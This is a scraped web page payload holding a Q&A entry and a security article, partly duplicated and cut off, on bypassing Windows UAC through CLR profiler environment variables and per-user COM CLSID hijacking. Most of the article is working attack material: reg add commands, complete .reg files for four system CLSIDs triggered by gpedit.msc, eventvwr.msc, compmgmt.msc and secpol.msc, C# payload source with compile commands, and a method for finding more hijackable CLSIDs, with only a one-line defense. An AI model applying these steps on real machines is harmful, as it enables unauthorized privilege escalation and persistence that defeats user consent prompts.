[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f2RAJfsaxivwnqHYNlpa8kAvaanMBO-rj7oLBRyi285M":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},455,"Which system CLSIDs can be hijacked to bypass UAC when launching specific Microsoft Management Console (MMC) snap-ins?","The article identifies at least three CLSIDs that can be hijacked under `HKCU\\Software\\Classes\\CLSID` to trigger a managed DLL when certain snap-ins are launched. For example, `{B29D466A-857D-35BA-8712-A758861BFEA1}` is invoked by `gpedit.msc`, and `{D5AB5662-131D-453D-88C8-9BBA87502ADE}` is invoked by `compmgmt.msc`, `eventvwr.msc`, `secpol.msc`, and `taskschd.msc`. Each requires setting `InprocServer32` to point to `mscoree.dll` with a custom `CodeBase` pointing to the attacker’s managed DLL. This method is similar to other COM-based UAC bypasses like [Bypassing UAC via COM Component IARPUninstallStringLauncher](\u002Fnews\u002Fbypassing-uac-via-com-component-iarpuninstallstringlauncher).","\u003Cp>The article identifies at least three CLSIDs that can be hijacked under `HKCU\\Software\\Classes\\CLSID` to trigger a managed DLL when certain snap-ins are launched. For example, `{B29D466A-857D-35BA-8712-A758861BFEA1}` is invoked by `gpedit.msc`, and `{D5AB5662-131D-453D-88C8-9BBA87502ADE}` is invoked by `compmgmt.msc`, `eventvwr.msc`, `secpol.msc`, and `taskschd.msc`. Each requires setting `InprocServer32` to point to `mscoree.dll` with a custom `CodeBase` pointing to the attacker’s managed DLL. This method is similar to other COM-based UAC bypasses like [Bypassing UAC via COM Component IARPUninstallStringLauncher](\u002Fnews\u002Fbypassing-uac-via-com-component-iarpuninstallstringlauncher).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fuse-clr-to-bypass-uac\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","which-system-clsids-can-be-hijacked-to-bypass-uac-when-launching-specific-micros-1777483685741","CLSID hijacking, MMC snap-ins, gpedit.msc, compmgmt.msc, eventvwr.msc, UAC bypass",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},114,"Use CLR to bypass UAC","use-clr-to-bypass-uac","Learn how to bypass UAC using CLR hijacking and system CLSID exploits. Exploit .Net programs like gpedit.msc for privilege escalation without admin rights.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In the previous article \"Use CLR to maintain persistence\", a backdoor that hijacks .Net programs via CLR was introduced. Its characteristics include not requiring administrator privileges and being able to hijack all .Net programs. Therefore, if a high-privilege .Net program is hijacked, UAC can be bypassed, such as with gpedit.msc.\u003C\u002Fp>\u003Cp>Recently, I also saw the same exploitation idea on clem@clavoillotte's blog, and his blog contains more areas worth learning. So, I have organized the content introduced in his blog, combined with my own experience, made appropriate additions, and shared it with everyone.\u003C\u002Fp>\u003Cp>clem@clavoillotte's blog address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Foffsec.provadys.com\u002FUAC-bypass-dotnet.html\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will introduce the following:\u003C\u002Fp>\u003Cul>\u003Cli>Method of using CLR to bypass UAC\u003C\u002Fli>\u003Cli>Method of hijacking system CLSID to bypass UAC\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Using CLR to bypass UAC\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In my article \"Use CLR to maintain persistence\", I used wmic to modify environment variables. The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wmic ENVIRONMENT create name=\"COR_ENABLE_PROFILING\",username=\"%username%\",VariableValue=\"1\"\u003Cbr>wmic ENVIRONMENT create name=\"COR_PROFILER\",username=\"%username%\",VariableValue=\"{11111111-1111-1111-1111-111111111111}\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Added a method using PowerShell to modify environment variables in 'Use Logon Scripts to maintain persistence', code as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>New-ItemProperty \"HKCU:\\Environment\\\" COR_ENABLE_PROFILING -value \"1\" -propertyType string | Out-Null\u003Cbr>New-ItemProperty \"HKCU:\\Environment\\\" COR_PROFILER -value \"{11111111-1111-1111-1111-111111111111}\" -propertyType string | Out-Null\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>clem@clavoillotte's method is to directly use reg add, code as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>REG ADD \"HKCU\\Software\\Classes\\CLSID\\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}\\InprocServer32\" \u002Fve \u002Ft REG_EXPAND_SZ \u002Fd \"C:\\Temp\\test.dll\" \u002Ff\u003Cbr>REG ADD \"HKCU\\Environment\" \u002Fv \"COR_PROFILER\" \u002Ft REG_SZ \u002Fd \"{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>clem@clavoillotte's POC:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>REG ADD \"HKCU\\Software\\Classes\\CLSID\\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}\\InprocServer32\" \u002Fve \u002Ft REG_EXPAND_SZ \u002Fd \"C:\\Temp\\test.dll\" \u002Ff\u003Cbr>REG ADD \"HKCU\\Environment\" \u002Fv \"COR_PROFILER\" \u002Ft REG_SZ \u002Fd \"{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}\" \u002Ff\u003Cbr>REG ADD \"HKCU\\Environment\" \u002Fv \"COR_ENABLE_PROFILING\" \u002Ft REG_SZ \u002Fd \"1\" \u002Ff\u003Cbr>REG ADD \"HKCU\\Environment\" \u002Fv \"COR_PROFILER_PATH\" \u002Ft REG_SZ \u002Fd \"C:\\Temp\\test.dll\" \u002Ff\u003Cbr>mmc gpedit.msc\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Personally, I believe there is no need to specify the environment variable COR_PROFILER_PATH. The refined POC is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>REG ADD \"HKCU\\Software\\Classes\\CLSID\\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}\\InprocServer32\" \u002Fve \u002Ft REG_EXPAND_SZ \u002Fd \"C:\\test\\calc.dll\" \u002Ff\u003Cbr>REG ADD \"HKCU\\Environment\" \u002Fv \"COR_PROFILER\" \u002Ft REG_SZ \u002Fd \"{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}\" \u002Ff\u003Cbr>REG ADD \"HKCU\\Environment\" \u002Fv \"COR_ENABLE_PROFILING\" \u002Ft REG_SZ \u002Fd \"1\" \u002Ff\u003Cbr>mmc gpedit.msc\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The test DLL is still based on the standard C++ DLL template. Download link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.某开源项目.dll\u003C\u002Fp>\u003Cp>gpedit.msc will launch normally while calculator pops up with high privileges\u003C\u002Fp>\u003Cp>As shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017319428_0_57a3fcdd7d.jpeg\">\u003C\u002Fp>\u003Cp>To only launch calculator without executing gpedit.msc, add ExitProcess(0); after the startup code WinExec(\"calc.exe\",SW_SHOWNORMAL);\u003C\u002Fp>\u003Cp>The compiled DLL has been uploaded. Download link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.某开源项目.dll\u003C\u002Fp>\u003Cp>Test result as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017363111_1_62fabad8c3.jpeg\">\u003C\u002Fp>\u003Cp>Calculator runs with high privileges, successfully bypassing UAC\u003C\u002Fp>\u003Ch2>0x03 Hijacking System CLSID to Bypass UAC\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>clem@clavoillotte shared in a blog how to hijack system CLSID to achieve UAC bypass, so next we will test them one by one and mark points that need attention\u003C\u002Fp>\u003Ch3>1. {B29D466A-857D-35BA-8712-A758861BFEA1}\u003C\u002Fh3>\u003Cp>The registry file is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Windows Registry Editor Version 5.00\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{B29D466A-857D-35BA-8712-A758861BFEA1}]\u003Cbr>@=\"Microsoft.GroupPolicy.AdmTmplEditor.GPMAdmTmplEditorManager\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{B29D466A-857D-35BA-8712-A758861BFEA1}\\Implemented Categories]\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{B29D466A-857D-35BA-8712-A758861BFEA1}\\Implemented Categories\\{62C8FE65-4EBB-45E7-B440-6E39B2CDBF29}]\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{B29D466A-857D-35BA-8712-A758861BFEA1}\\InprocServer32]\u003Cbr>@=\"C:\\\\Windows\\\\System32\\\\mscoree.dll\"\u003Cbr>\"Assembly\"=\"TestDotNet, Version=0.0.0.0, Culture=neutral\"\u003Cbr>\"Class\"=\"TestDotNet.Class1\"\u003Cbr>\"RuntimeVersion\"=\"v4.0.30319\"\u003Cbr>\"ThreadingModel\"=\"Both\"\u003Cbr>\"CodeBase\"=\"file:\u002F\u002FC:\u002F\u002FTemp\u002F\u002Ftest_managed.dll\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{B29D466A-857D-35BA-8712-A758861BFEA1}\\InprocServer32\\10.0.0.0]\u003Cbr>\"Assembly\"=\"TestDotNet, Version=0.0.0.0, Culture=neutral\"\u003Cbr>\"Class\"=\"TestDotNet.Class1\"\u003Cbr>\"RuntimeVersion\"=\"v4.0.30319\"\u003Cbr>\"CodeBase\"=\"file:\u002F\u002FC:\u002F\u002FTemp\u002F\u002Ftest_managed.dll\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{B29D466A-857D-35BA-8712-A758861BFEA1}\\ProgId]\u003Cbr>@=\"Microsoft.GroupPolicy.AdmTmplEditor.GPMAdmTmplEditorManager\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The entry @=\"Microsoft.GroupPolicy.AdmTmplEditor.GPMAdmTmplEditorManager\" in the registry indicates that this CLSID is invoked when executing gpedit.msc\u003C\u002Fp>\u003Cp>The C# code to generate test_managed.dll is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>using System;\u003Cbr>using System.Diagnostics;\u003Cbr>\u003Cbr>namespace TestDotNet\u003Cbr>{\u003Cbr>   public class Class1\u003Cbr>   {\u003Cbr>      static Class1()\u003Cbr>      { \u003Cbr>         Process.Start(\"calc.exe\");\u003Cbr>         Environment.Exit(0);\u003Cbr>      }\u003Cbr>   }\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Save as TestDotNet.cs and compile into a dll\u003C\u002Fp>\u003Cp>Use csc.exe to compile and generate the dll:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe \u002Ft:library TestDotNet.cs\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Use csc.exe from the .Net 4.0 directory\u003C\u002Fp>\u003Cp>Rename the generated TestDotNet.dll to test_managed.dll to successfully bypass UAC, as shown in the test below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017392067_2_13794b1558.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Additional tip regarding C# compilation files:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>When compiling a C# program using Visual Studio, if the project name does not match the assembly name (i.e., the namespace) (in this context, the assembly name in the code is TestDotNet, but the newly created project name is Class1), you need to reassign the assembly name, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017420006_3_264622af73.jpeg\">\u003C\u002Fp>\u003Cp>Similarly, this issue also exists when using csc.exe to compile and generate files\u003C\u002Fp>\u003Cp>For example, if the source code is saved as a.cs, then when outputting, you must add the \u002Fout parameter to specify the output file as TestDotNet.dll, so that the assembly name also defaults to TestDotNet (matching the source code). The specific parameters are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe \u002Ft:library \u002Fout:TestDotNet.dll a.cs\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Otherwise, although the dll can be loaded, it cannot be executed, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017463191_4_53a62cc984.jpeg\">\u003C\u002Fp>\u003Ch3>2. {D5AB5662-131D-453D-88C8-9BBA87502ADE}\u003C\u002Fh3>\u003Cp>The registry file is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Windows Registry Editor Version 5.00\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{D5AB5662-131D-453D-88C8-9BBA87502ADE}]\u003Cbr>@=\"Microsoft.ManagementConsole.Advanced.FrameworkSnapInFactory\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{D5AB5662-131D-453D-88C8-9BBA87502ADE}\\Implemented Categories]\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{D5AB5662-131D-453D-88C8-9BBA87502ADE}\\Implemented Categories\\{62C8FE65-4EBB-45e7-B440-6E39B2CDBF29}]\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{D5AB5662-131D-453D-88C8-9BBA87502ADE}\\InprocServer32]\u003Cbr>@=\"C:\\\\Windows\\\\System32\\\\mscoree.dll\"\u003Cbr>\"Assembly\"=\"TestDotNet, Version=0.0.0.0, Culture=neutral\"\u003Cbr>\"Class\"=\"TestDotNet.Class1\"\u003Cbr>\"RuntimeVersion\"=\"v2.0.50727\"\u003Cbr>\"ThreadingModel\"=\"Both\"\u003Cbr>\"CodeBase\"=\"file:\u002F\u002FC:\u002F\u002FTemp\u002F\u002Ftest_managed.dll\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{D5AB5662-131D-453D-88C8-9BBA87502ADE}\\InprocServer32\\3.0.0.0]\u003Cbr>\"Assembly\"=\"TestDotNet, Version=0.0.0.0, Culture=neutral\"\u003Cbr>\"Class\"=\"TestDotNet.Class1\"\u003Cbr>\"RuntimeVersion\"=\"v2.0.50727\"\u003Cbr>\"CodeBase\"=\"file:\u002F\u002FC:\u002F\u002FTemp\u002F\u002Ftest_managed.dll\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>In the registry key, @=\"Microsoft.ManagementConsole.Advanced.FrameworkSnapInFactory\". The following commands will invoke this CLSID when executed:\u003C\u002Fp>\u003Cul>\u003Cli>compmgmt.msc\u003C\u002Fli>\u003Cli>eventvwr.msc\u003C\u002Fli>\u003Cli>secpol.msc\u003C\u002Fli>\u003Cli>taskschd.msc\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Compile the DLL using csc.exe:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\csc.exe \u002Ft:library TestDotNet.cs\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The DLL must be compiled using .NET 2.0\u003C\u002Fp>\u003Ch3>3. {0A29FF9E-7F9C-4437-8B11-F424491E3931}\u003C\u002Fh3>\u003Cp>The registry file is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Windows Registry Editor Version 5.00\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}]\u003Cbr>@=\"NDP SymBinder\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\InprocServer32]\u003Cbr>@=\"C:\\\\Windows\\\\System32\\\\mscoree.dll\"\u003Cbr>\"ThreadingModel\"=\"Both\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\InprocServer32\\4.0.30319]\u003Cbr>@=\"4.0.30319\"\u003Cbr>\"ImplementedInThisVersion\"=\"\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\ProgID]\u003Cbr>@=\"CorSymBinder_SxS\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\Server]\u003Cbr>@=\"C:\\\\Temp\\\\test_unmanaged.dll\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The test systems were Win7 and Win10, which were unsuccessful, so I modified the script. The modified file is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Windows Registry Editor Version 5.00\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}]\u003Cbr>@=\"NDP SymBinder\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\InprocServer32]\u003Cbr>@=\"C:\\\\Temp\\\\test_unmanaged.dll\"\u003Cbr>\"ThreadingModel\"=\"Both\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The test_unmanaged.dll here differs from those in steps 1 and 2; a standard DLL is required here to achieve DLL hijacking. DLL download address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.某开源项目.dll\u003C\u002Fp>\u003Cp>Executing any of the following code can trigger DLL hijacking and achieve UAC bypass:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Windows\\System32\\eventvwr.exe\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>or\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Windows\\System32\\mmc.exe CompMgmt.msc\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>This exploitation method was also introduced by b33f@FuzzySecurity at DefCon25. For details, refer to the following link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.com\u002FFuzzySecurity\u002FDefCon25\u002Fmaster\u002FLab-Writeup.txt\u003C\u002Fp>\u003Ch3>4、{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}\u003C\u002Fh3>\u003Cp>The registry file is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Windows Registry Editor Version 5.00\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}]\u003Cbr>@=\"Microsoft Common Language Runtime Meta Data\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}\\InprocServer32]\u003Cbr>@=\"C:\\\\Windows\\\\System32\\\\mscoree.dll\"\u003Cbr>\"ThreadingModel\"=\"Both\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}\\InprocServer32\\4.0.30319]\u003Cbr>@=\"4.0.30319\"\u003Cbr>\"ImplementedInThisVersion\"=\"\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}\\ProgID]\u003Cbr>@=\"CLRMetaData.CorRuntimeHost.2\"\u003Cbr>\u003Cbr>[HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}\\Server]\u003Cbr>@=\"..\\\\..\\\\..\\\\..\\\\Temp\\\\test_unmanaged.dll\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The test_unmanaged.dll here differs from those in steps 1 and 2; a standard DLL is required here to implement DLL hijacking. DLL download address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fraw.githubusercontent.某开源项目.dll\u003C\u002Fp>\u003Cp>Execute secpol.msc to trigger DLL hijacking, test as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017479501_5_7baf470e02.jpeg\">\u003C\u002Fp>\u003Ch2>0x04 Supplement\u003C\u002Fh2>\u003Cp>Use Procmon to record the startup process of gpedit.msc, search for exploitable system CLSIDs, with the following characteristics:\u003C\u002Fp>\u003Cp>Open registry key HKCU:\\Software\\Classes\\CLSID\\{****}\\InprocServer32, returns NAME NOT FOUND\u003C\u002Fp>\u003Cp>Open registry key HKCR:\\CLSID\\{****}\\InprocServer32, returns SUCCESS\u003C\u002Fp>\u003Cp>As shown in the figure below, the marked CLSIDs meet the requirements\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017488625_6_3092b7c810.jpeg\">\u003C\u002Fp>\u003Cp>On the test system Win7 x86, the following CLSIDs meeting the requirements were found:\u003C\u002Fp>\u003Cul>\u003Cli>{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}\u003C\u002Fli>\u003Cli>{B708457E-DB61-4C55-A92F-0D4B5E9B1224}\u003C\u002Fli>\u003Cli>{871C5380-42A0-1069-A2EA-08002B30309D}\u003C\u002Fli>\u003Cli>{D02B1F72-3407-48ae-BA88-E8213C6761F1}\u003C\u002Fli>\u003Cli>{B29D466A-857D-35BA-8712-A758861BFEA1}\u003C\u002Fli>\u003Cli>{D02B1F73-3407-48AE-BA88-E8213C6761F1}\u003C\u002Fli>\u003Cli>{B0395DA5-6A15-4E44-9F36-9A9DC7A2F341}\u003C\u002Fli>\u003Cli>{ADE6444B-C91F-4E37-92A4-5BB430A33340}\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x05 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Monitor the creation and modification of key values under HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\ in the registry\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Microsoft does not consider UAC bypass as a vulnerability, which is understandable from their perspective. However, in penetration testing, situations often arise where UAC bypass is necessary, and certain UAC bypass methods can even be leveraged for further exploitation. From a defensive standpoint, it is important to remind defenders to stay vigilant about UAC bypass techniques.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In the previous article \"Use CLR to maintain persistence\", a backdoor that hijacks .Net programs via CLR was introduced. Its characteristics include not requiring administrator privileges and being able to hijack all .Net programs. Therefore, if a high-privilege .Net program is hijacked, UAC can be bypassed, such as with gpedit.msc.\u003C\u002Fp>\u003Cp>Recently, I also saw the same exploitation idea on clem@clavoillotte's blog, and his blog contains more areas worth learning. So, I have organized the content introduced in his blog, combined with my own experience, made appropriate additions, and shared it with everyone.\u003C\u002Fp>\u003Cp>clem@clavoillotte's blog address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Foffsec.provadys.com\u002FUAC-bypass-dotnet.html\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will introduce the following:\u003C\u002Fp>\u003Cul>\u003Cli>Method of using CLR to bypass UAC\u003C\u002Fli>\u003Cli>Method of hijacking system CLSID to bypass UAC\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Using CLR to bypass UAC\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In my article \"Use CLR to maintain persistence\", I used wmic to modify environment variables. The code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>wmic ENVIRONMENT create name=\"COR_ENABLE_PROFILING\",username=\"%username%\",VariableValue=\"1\"\u003Cbr>wmic ENVIRONMENT create name=\"COR_PROFILER\",username=\"%username%\",VariableValue=\"{11111111-1111-1111-1111-111111111111}\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Added a method using PowerShell to modify environment variables in 'Use Logon Scripts to maintain persistence', code as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>New-ItemProperty \"HKCU:\\Environment\\\" COR_ENABLE_PROFILING -value \"1\" -propertyType string | Out-Null\u003Cbr>New-ItemProperty \"HKCU:\\Environment\\\" COR_PROFILER -value \"{11111111-1111-1111-1111-111111111111}\" -propertyType string | Out-Null\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>clem@clavoillotte's method is to directly use reg add, code as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>REG ADD \"HKCU\\Software\\Classes\\CLSID\\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}\\InprocServer32\" \u002Fve \u002Ft REG_EXPAND_SZ \u002Fd \"C:\\Temp\\test.dll\" \u002Ff\u003Cbr>REG ADD \"HKCU\\Environment\" \u002Fv \"COR_PROFILER\" \u002Ft REG_SZ \u002Fd \"{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>clem@clavoillotte's POC:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>REG ADD \"HKCU\\Software\\Classes\\CLSID\\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}\\InprocServer32\" \u002Fve \u002Ft REG_EXPAND_SZ \u002Fd \"C:\\Temp\\test.dll\" \u002Ff\u003Cbr>REG ADD \"HKCU\\Environment\" \u002Fv \"COR_PROFILER\" \u002Ft 